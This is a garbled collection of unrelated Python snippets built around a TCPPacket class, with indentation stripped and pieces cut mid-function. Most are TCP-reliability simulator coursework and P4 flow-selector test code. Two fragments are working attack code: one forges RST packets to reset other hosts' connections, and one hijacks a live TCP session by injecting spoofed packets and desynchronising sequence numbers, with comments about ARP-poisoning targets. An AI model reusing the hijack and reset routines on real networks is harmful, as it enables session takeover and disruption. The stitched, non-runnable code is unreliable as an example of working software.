def sendNextPacket(self, eventQueue, t):
"""Sends the next packet in the message."""
nBytes = min(MAX_PACKET_DATA, len(self.msgBytes) - self.seq)
data = self.msgBytes[self.seq:self.seq + nBytes]
p = TCPPacket(seq=self.seq, ack=self.ack, ACK=True, data=data)
if self.seq + nBytes == len(self.msgBytes):
p.FIN = True
#adding the checksum to the packet
p.checksum = (checksum16(p.toBytes()) ^ 0xFFFF )
#adds event for server to receive this packet
e = ReceivePacketEvent(self.server, p)
#there's a chance that the packet will be lost:
if(random.random()>LOST_PACKET_PROBABILITY):
eventQueue.enqueue(e, t + TRANSMISSION_DELAY)
if p.FIN:
# if this is the last packet, it will start over.
self.queueRequestMessage(eventQueue, t + ROUND_TRIP_TIME)
#remember to add a timeout event
#toe = TimeoutEvent(self.server, p)
toe = TimeoutEvent(self, p)
eventQueue.enqueue(toe, t + 2*TRANSMISSION_DELAY)
def reset_stream(self, handle):
print("Waiting for ACK packet to reset the stream..")
while 1:
packet = handle.next()
flags = packet.tcp_get_flags()
if (flags["ack"] and not flags["syn"]
and not len(packet.tcp_payload)):
args = {
"mac_src" : tuple([int(i, 16) for i in packet.ethernet_dst.split(":")]),
"mac_dst" : tuple([int(i, 16) for i in packet.ethernet_src.split(":")]),
"ip_source" : packet.ip_dest,
"ip_dest" : packet.ip_source,
"tcp_src" : packet.tcp_dst,
"tcp_dst" : packet.tcp_src,
"tcp_seq" : packet.tcp_seq_ack,
}
pkt = TCPPacket(args)
pkt.tcp_set_flags(rst = 1)
pkt.calc_len()
pkt.calc_csum()
for i in range(5):
pkt.sendto(pkt.to_bytes(), (self.dev, 0))
print("Stream has been reseted.")
break
def sendNextPacket(self, eventQueue, t):
"""Sends the next packet in the message."""
nBytes = min(MAX_PACKET_DATA, len(self.msgBytes) - self.seq)
data = self.msgBytes[self.seq:self.seq + nBytes]
p = TCPPacket(seq=self.seq, ack=self.ack, ACK=True, data=data)
if self.seq + nBytes == len(self.msgBytes):
p.FIN = True
e = ReceivePacketEvent(self.server, p)
if random.randint(0, 1) >= LOST_PACKET_PROBABILITY:
eventQueue.enqueue(e, t + TRANSMISSION_DELAY)
if p.FIN:
self.queueRequestMessage(eventQueue, t + TIMEOUT)
def sendXPackets(self,eventQueue,t,x):
#creates the packets
packets = []
for i in range(x):
nBytes = min(MAX_PACKET_DATA, len(self.msgBytes) - self.seq)
data = self.msgBytes[self.seq:self.seq + nBytes]
p = TCPPacket(seq=self.seq,ack=self.ack,ACK =True, data=data) # no reason to have ack here?
#adding the checksum to the packet
p.checksum = (checksum16(p.toBytes()) ^ 0xFFFF )
packets.append(p)
# if self.seq extends the amount of data in msgBytes, there're
# no more packets to make
if self.seq + (len(p.data))>= len(self.msgBytes):
#this will be the last packet
if DEBUG:
print('all the packets are sent!')
p.FIN = True
#at this point, also need to recalculate the checksum
p.checksum = 0x0000
p.checksum = (checksum16(p.toBytes()) ^ 0xFFFF )
break
#add to sequence
self.seq += nBytes
#now to send all the packets!
for p in packets:
e = ReceivePacketEvent(self.server, p)
#there's a chance that the packet WON'T be lost:
if(random.random()>LOST_PACKET_PROBABILITY):
if DEBUG:
print("packet %r isn't lost"% p.data)
eventQueue.enqueue(e, t + TRANSMISSION_DELAY)
#I'm moving this to when the serverreceives the last message
#if p.FIN:
#self.queueRequestMessage(eventQueue, 66 +t + ROUND_TRIP_TIME)
else:
#if lost
#if DEBUG:
print("packet %r is LOST!!!"% p.data)
#remember to add a timeout event
toe = TimeoutEvent(self.server, p)
eventQueue.enqueue(toe, t + 2*TRANSMISSION_DELAY)
t+=1
if DEBUG:
print("all packets in this batch are sent")
print("here's the event queue:",str(eventQueue))
def sendNextPacket(self, eventQueue, t):
"""Sends the next packet in the message."""
nBytes = min(MAX_PACKET_DATA, len(self.msgBytes) - self.seq)
data = self.msgBytes[self.seq:self.seq + nBytes]
p = TCPPacket(seq=self.seq, ack=self.ack, ACK=True, data=data)
if self.seq + nBytes == len(self.msgBytes):
p.FIN = True
self.awaitingAck[checksum16(p.toBytes())] = p
if keepPacketBool():
e = ReceivePacketEvent(self.server, p)
eventQueue.enqueue(e, t + TRANSMISSION_DELAY)
self.queueTimeoutMessage(p,eventQueue,t)
if p.FIN:
self.queueRequestMessage(eventQueue, t + TIMEOUT)
def receivePacket(self, p, eventQueue, t):
"""
Handles packets sent from the server and sends an acknowledgment
back in return. This version assumes that the sequence numbers
appear in the correct order.
"""
##
## THIS JUST SENDS THE ACK!!
##
#self.msgBytes.extend(p.data)
if p.seq == self.seq:
self.seq+= len(p.data)
self.msgBytes.extend(p.data)
#there used to be something here that kept track of received packets
# so that client didn't need to resend EVERYTHING, but I didn't implement
# it well so I deleted it.
self.ack = self.seq
if DEBUG:
print("server received %r and its seq/ack is now %r" % (p.data,self.ack))
reply = TCPPacket(seq=self.seq, ack=self.ack, ACK=True)
if p.FIN and self.ack >= p.seq: #I should also check here to make sure last complete set is here
reply.FIN = True
print("Server receives \"" + self.msgBytes.decode("UTF-8") + "\"")
if DEBUG:
print("Cool I got all the packets! ")
self.resetForNextMessage()
eventQueue.clear()
self.client.queueRequestMessage(eventQueue, t + ROUND_TRIP_TIME)
#adding the checksum to the packet
reply.checksum = (checksum16(reply.toBytes()) ^ 0xFFFF )
# here is where we should send the ack
e = ReceivePacketEvent(self.client, reply)
eventQueue.enqueue(e, t + TRANSMISSION_DELAY)
def receivePacket(self, p, eventQueue, t):
"""
Handles packets sent from the server and sends an acknowledgment
back in return. This version assumes that the sequence numbers
appear in the correct order.
"""
self.msgBytes.extend(p.data)
self.seq = p.ack
self.ack = p.seq + len(p.data)
reply = TCPPacket(seq=self.seq, ack=self.ack, ACK=True, checksum = ~checksum16(p.toBytes()))
if p.FIN:
reply.FIN = True
print("Server receives \"" + self.msgBytes.decode("UTF-8") + "\"")
self.resetForNextMessage()
e = ReceivePacketEvent(self.client, reply)
eventQueue.enqueue(e, t + TRANSMISSION_DELAY)
def processRecv(self, expecting_packet):
channel = self.get_channel()
if not channel or channel.isCondemn():
return False
packet = TCPPacket()
length = packet.recvFromEndPoint(self._endpoint)
if length < 0:
self.onGetError(channel)
return False
elif length == 0:
return False
if not self.processPacket(channel, packet):
print "processRecv failed"
return True
def receivePacket(self, p, eventQueue, t):
"""
Handles packets sent from the server and sends an acknowledgment
back in return. This version assumes that the sequence numbers
appear in the correct order.
"""
def checkAllReceived():
# Sorts self.recieved
self.received.sort()
correctAck = MAX_PACKET_DATA
# Check if packets are missing
for ack, _ in self.received:
if ack > correctAck:
return False
correctAck += MAX_PACKET_DATA
return True
self.seq = p.ack
self.ack = p.seq + len(p.data)
if (self.ack, p.data) not in self.received:
self.received.append((self.ack, p.data))
if p.FIN:
self.receivedFIN = True
reply = TCPPacket(seq=self.seq,
ack=self.ack,
ACK=True,
checksum=~checksum16(p.toBytes()),
window=RECIEVE_WINDOW)
#If all packets are present, message complete.
if self.receivedFIN and checkAllReceived():
self.received.sort()
for _, data in self.received:
self.msgBytes.extend(data)
reply.FIN = True
e = ReceivePacketEvent(self.client, reply)
eventQueue.enqueue(e, t + TRANSMISSION_DELAY)
print("Server receives \"" + self.msgBytes.decode("UTF-8") + "\"")
self.resetForNextMessage()
else:
if random.random() > LOST_PACKET_PROBABILITY:
e = ReceivePacketEvent(self.client, reply)
eventQueue.enqueue(e, t + TRANSMISSION_DELAY)
def sendNextPacket(self, eventQueue, t):
"""Sends the next packet in the message."""
nBytes = min(MAX_PACKET_DATA, len(self.msgBytes) - self.seq)
data = self.msgBytes[self.seq:self.seq + nBytes]
p = TCPPacket(seq=self.seq, ack=self.ack, ACK=True, data=data)
if self.seq + nBytes == len(self.msgBytes):
p.FIN = True
e = ReceivePacketEvent(self.server, p)
#With some probability, lose the packet
if random.random() > LOST_PACKET_PROBABILITY:
eventQueue.enqueue(e, t + TRANSMISSION_DELAY)
#Queue the timeout event
timeout = TimeoutEvent(self, p)
self.waitingForAck[checksum16(p.toBytes())] = p
eventQueue.enqueue(timeout, t + 4 * TRANSMISSION_DELAY)
self.seq += nBytes
self.ack = self.seq + 1
#If we aren't finished and serverRecieveWindow allows it, send next bytes
if not p.FIN and len(self.waitingForAck) < self.serverRecieveWindow:
self.sendNextPacket(eventQueue, t)
rnode = self.rtree.add(prefix)
rnode.data['id'] = int(metadata[0])
def process_packet(self, packet):
rnode = self.rtree.search_best(packet.dst_ip)
if rnode is not None:
for k, v in rnode.data.items():
packet.metadata[k] = v
return True
else:
return False
if __name__ == '__main__':
from packet import TCPPacket
fwtable = FWTable('log', 20, 'fr_fwtable.log')
fwtable.add_fw_rule('2.2.2.0/24', {'meta1': 1, 'meta2': 'salut'})
p1 = TCPPacket(1, '1.1.1.1', '2.2.2.2', 1, 2, 3, 10, 10, 10, False, False)
p2 = TCPPacket(1, '1.1.1.1', '2.2.3.2', 1, 2, 3, 10, 10, 10, False, False)
fwtable.process_packet(p1)
print p1
fwtable.process_packet(p2)
print p2
def control_stream_o(self, handle):
print("Waiting for ACK packet to inject payload..")
while 1:
packet = handle.next()
flags = packet.tcp_get_flags()
if (flags["ack"] and not flags["syn"]
and not len(packet.tcp_payload)):
'''
We only hijack the session on an ACK packet without a payload.
This is because it becomes a race condition of responding to a
payload packet between the attacker and the target host. The chance
of this is large being connected to a HUB, large if targetting yourself,
and low if the target is ARP poisoned. The packet below will screw up the
stream at both sides, after that you can send data freely.
'''
args = {
"mac_src" : tuple([int(i, 16) for i in packet.ethernet_dst.split(":")]),
"mac_dst" : tuple([int(i, 16) for i in packet.ethernet_src.split(":")]),
"ip_source" : packet.ip_dest,
"ip_dest" : packet.ip_source,
"tcp_src" : packet.tcp_dst,
"tcp_dst" : packet.tcp_src,
"tcp_seq" : packet.tcp_seq_ack,
"tcp_seq_ack" : packet.tcp_seq,
"payload" : b"\x41" * 40
}
pkt = TCPPacket(args)
pkt.tcp_set_flags(push = 1, ack = 1)
pkt.calc_len()
pkt.calc_csum()
pkt.sendto(pkt.to_bytes(), (self.dev, 0))
break
print("Payload injected. Targets kernel is now -40 SEQ on transmission.")
# Save a the SEQ and ACK numbers
self.tcp_seq = packet.tcp_seq_ack + 40
self.tcp_ack = packet.tcp_seq
# Create a lock object
lock = threading.Lock()
# Start the input stream handler
tid = threading.Thread(target = self.control_stream_i, args = (handle, lock))
tid.start()
if (self.input_method == 1):
while 1:
pkt.tcp_seq = self.tcp_seq
pkt.tcp_payload = input("TCPHijack: ").encode("utf-8")
lock.acquire()
pkt.tcp_seq_ack = self.tcp_ack
pkt.calc_len()
pkt.calc_csum()
pkt.sendto(pkt.to_bytes(), (self.dev, 0))
lock.release()
self.tcp_seq += len(pkt.tcp_payload)
else:
with open(self.file, "rt") as f:
for line in f:
pkt.tcp_seq = self.tcp_seq
lock.acquire()
pkt.tcp_seq_ack = self.tcp_ack
pkt.tcp_payload = line.encode("utf-8")
pkt.calc_len()
pkt.calc_csum()
pkt.sendto(pkt.to_bytes(), (self.dev, 0))
lock.release()
self.tcp_seq += len(pkt.tcp_payload)
time.sleep(1)
def control_stream_i(self, handle, lock):
pkt = TCPPacket()
while 1:
packet = handle.next()
if (not len(packet.tcp_payload)): continue
lock.acquire()
self.tcp_ack += len(packet.tcp_payload)
pkt.ethernet_src = tuple([int(i, 16) for i in packet.ethernet_dst.split(":")])
pkt.ethernet_dst = tuple([int(i, 16) for i in packet.ethernet_src.split(":")])
pkt.ip_source = packet.ip_dest
pkt.ip_dest = packet.ip_source
pkt.tcp_src = packet.tcp_dst
pkt.tcp_dst = packet.tcp_src
pkt.tcp_seq = self.tcp_seq
pkt.tcp_seq_ack = self.tcp_ack
pkt.tcp_set_flags(ack = 1)
pkt.calc_len()
pkt.calc_csum()
pkt.sendto(pkt.to_bytes(), (self.dev, 0))
lock.release()
seq = int(linetab[3])
src_port = int(linetab[4])
dst_port = int(linetab[5])
ip_len = int(linetab[6])
ip_hdr_len = int(linetab[7])
tcp_hdr_len = int(linetab[8])
tcp_flag = int(linetab[9], 16)
syn_flag = ( tcp_flag & dpkt.tcp.TH_SYN ) != 0
fin_flag = ( tcp_flag & dpkt.tcp.TH_FIN ) != 0
ret = True if linetab[10] == '1' else False
except ValueError:
print line
continue
# Create the packet object
packet = TCPPacket(ts, src_ip, dst_ip, seq, src_port, dst_port, ip_len, \
ip_hdr_len, tcp_hdr_len, syn_flag, fin_flag, ret=ret)
if packet is not None and pkt_offset <= 0:
# Send that packet through the p4 pipeline
p4pipeline.process_packet(packet)
pkt_offset -= 1
# Read pcap from a pcap file
else:
for packet in parse_pcap.pcap_reader(pcap_file):
if packet is not None and pkt_offset <= 0:
p4pipeline.process_packet(packet)
pkt_offset -= 1
p4pipeline.close()
registers['flowselector_key'] = [0] * 10
registers['flowselector_ts'] = [0] * 10
registers['flowselector_nep'] = [0] * 10
registers['flowselector_5tuple'] = [''] * 10
registers['flowselector_last_ret'] = [0] * 10
registers['sw'] = []
for _ in xrange(0, 10):
registers['sw'] += [0] * 10
registers['sw_index'] = [0] * 10
registers['sw_time'] = [0] * 10
registers['sw_sum'] = [0] * 10
hfs = FlowSelector('log', 25, registers, 32, 2, 2, seed=10)
p1 = TCPPacket(1, '1.1.1.1', '2.2.2.2', 1, 2, 3, 21, 10, 10, False, False)
p1.metadata['id'] = 0
p2 = TCPPacket(1.1, '1.1.1.1', '2.2.2.2', 1, 2, 3, 21, 10, 10, False, False)
p2.metadata['id'] = 0
p3 = TCPPacket(1.2, '1.1.1.1', '2.2.2.3', 1, 2, 3, 21, 10, 10, False, False)
p3.metadata['id'] = 0
p4 = TCPPacket(1.3, '1.1.1.1', '2.2.2.3', 2, 2, 3, 21, 10, 10, False, False)
p4.metadata['id'] = 0
p5 = TCPPacket(1.4, '1.1.1.1', '2.2.2.3', 2, 2, 3, 21, 10, 10, False, False)
p5.metadata['id'] = 0
p6 = TCPPacket(1.7, '1.1.1.1', '2.2.2.4', 2, 2, 3, 21, 10, 10, False, False)
p6.metadata['id'] = 0
p7 = TCPPacket(1.8, '1.1.1.1', '2.2.2.4', 3, 2, 3, 21, 10, 10, False, False)
p7.metadata['id'] = 0
